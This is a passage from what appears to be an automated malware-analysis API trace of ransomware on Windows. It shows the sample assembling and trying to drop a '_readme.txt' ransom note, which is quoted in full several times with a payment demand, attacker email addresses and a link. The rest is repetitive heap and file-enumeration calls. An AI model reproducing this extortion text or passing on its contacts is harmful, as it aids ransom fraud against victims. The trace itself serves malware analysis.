purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.591] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.591] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.592] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.592] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.592] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.592] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.592] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.593] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.599] RtlAllocateHeap 